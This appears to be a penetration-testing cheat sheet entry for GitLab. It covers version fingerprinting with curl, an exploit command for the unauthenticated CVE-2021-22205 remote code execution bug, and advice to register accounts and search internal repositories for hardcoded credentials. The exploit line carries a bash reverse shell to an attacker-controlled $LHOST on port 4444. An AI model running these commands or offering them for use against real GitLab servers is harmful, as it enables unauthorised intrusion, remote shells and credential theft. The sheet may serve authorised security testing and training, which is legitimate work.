GitLab

What it is: Self-hosted Git repository manager with CI/CD. Public registration may be enabled, exposing internal source code. Multiple critical RCE CVEs in recent years.

Default ports: 80, 443, 8080

Vuln research:


Check GitLab version

Accessible via API or login page — Version determines exploit availability

curl -s http://$IP/api/v4/version
curl -s http://$IP/help | grep -i "GitLab"

GitLab RCE (CVE-2021-22205)

Unauthenticated RCE via image upload — GitLab 11.9-13.10.2

python3 gitlab_rce.py -u http://$IP -c "bash -i >& /dev/tcp/$LHOST/4444 0>&1"

Register account and explore

Public registration may be enabled — Access internal repos

# http://$IP/users/sign_up
# After login, check: /explore/projects
# Look for hardcoded credentials in repos